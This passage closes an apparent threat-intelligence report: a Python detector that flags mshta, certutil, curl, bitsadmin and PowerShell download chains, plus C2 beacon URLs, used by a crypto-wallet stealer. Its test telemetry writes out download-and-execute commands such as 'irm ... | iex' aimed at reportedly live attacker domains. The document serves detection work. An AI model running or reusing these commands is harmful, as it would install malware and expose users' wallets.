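        if SPOOFED_HTA_ARG.search(ev.cmdline):
            hits.append("mshta_spoofed_extension")       # Layer 1: non-.hta file run as HTA
        if parent == "cmd.exe" and "/c start" in pcl and "/b mshta.exe" in pcl:
            hits.append("cmd_start_b_mshta_chain")       # launch chain used when Falcon is present
    if image == "certutil.exe" and "-urlcache" in toks and "-f" in toks:
        hits.append("certutil_download")                 # fallback 2
    if image == "curl.exe" and "-k" in toks and "-o" in toks:
        hits.append("curl_insecure_download")            # fallback 3
    if image == "bitsadmin.exe" and "/transfer" in toks:
        hits.append("bitsadmin_transfer")                # fallback 4
    if image == "powershell.exe" and "-ep" in toks and "bypass" in toks and IRM_IEX.search(cl):
        hits.append("powershell_irm_iex")                # fallback 5
    return hits

def classify_url(url: str) -> list[str]:
    """Flag the /connect registration beacon; task endpoints alone are low confidence."""
    parts = urlsplit(url)
    q = parse_qs(parts.query)
    if parts.path == "/connect" and "hwid" in q and q.get("version") == ["4.1.1"] and "wallets" in q:
        return ["c2_registration_beacon"]
    if parts.path in ("/getUpdates", "/getModule", "/approveUpdate"):
        return ["c2_task_endpoint_lowconf"]              # paths also used by unrelated APIs: correlate
    return []

# Constructed telemetry: one event per behaviour plus a benign control.
CONSTRUCTED_PROCS = [
    ProcEvent("explorer.exe", "explorer.exe", "mshta.exe",
              'mshta.exe "C:\\Users\\u\\Downloads\\Travel_X_Config_917.wav"'),
    ProcEvent("cmd.exe", 'cmd.exe /c start "" /b mshta.exe https://s1-rarlab.com/getModule?name=m',
              "mshta.exe", "mshta.exe https://s1-rarlab.com/getModule?name=m"),
    ProcEvent("mshta.exe", "mshta.exe stage.hta", "certutil.exe",
              "certutil.exe -urlcache -split -f https://s1-rarlab.com/p p.bin"),
    ProcEvent("mshta.exe", "mshta.exe stage.hta", "powershell.exe",
              'powershell.exe -ep Bypass -nop "irm https://s1-rarlab.com/x | iex"'),
    ProcEvent("explorer.exe", "explorer.exe", "notepad.exe", "notepad.exe Sales_Core_Data_518.csv"),
]
CONSTRUCTED_URLS = [
    "https://web3-walletnotify.cc/connect?hwid=0123abcd&os=10&av=Defender&version=4.1.1&key=K&wallets=metamask&exts=2",
    "https://web3-walletnotify.cc/getUpdates",
    "https://example.invalid/connect?hwid=1",            # no version/wallets: not the beacon
]

def run() -> dict[str, list[str]]:
    """Map every constructed event and URL to the alerts it raises (empty = none)."""
    out = {ev.cmdline: classify_process(ev) for ev in CONSTRUCTED_PROCS}
    out.update({u: classify_url(u) for u in CONSTRUCTED_URLS})
    return out

if __name__ == "__main__":
    for item, alerts in run().items():
        print(f"{alerts or ['-']} <- {item}")
```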
Published by Breakglass Intelligence. Investigation conducted 2026-03-09. 6 MalwareBazaar samples analyzed. 5 C2 domains mapped. 76 wallet extensions extracted. All infrastructure live at time of publication. Classification: TLP:CLEAR